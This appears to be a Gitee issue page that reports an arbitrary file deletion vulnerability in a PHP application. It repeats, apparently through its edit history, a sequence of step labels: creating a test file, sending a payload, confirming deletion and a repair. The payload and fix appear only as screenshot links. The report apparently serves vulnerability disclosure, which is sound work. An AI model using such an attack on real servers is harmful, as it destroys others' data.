Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

原值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

Repair

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124324\_667a2c8b\_9830429.jpeg "xiufu.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

原值

Repair

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124324\_667a2c8b\_9830429.jpeg "xiufu.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

Repair

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124324\_667a2c8b\_9830429.jpeg "xiufu.jpg")

登录 后才可以发表评论

Tag

#php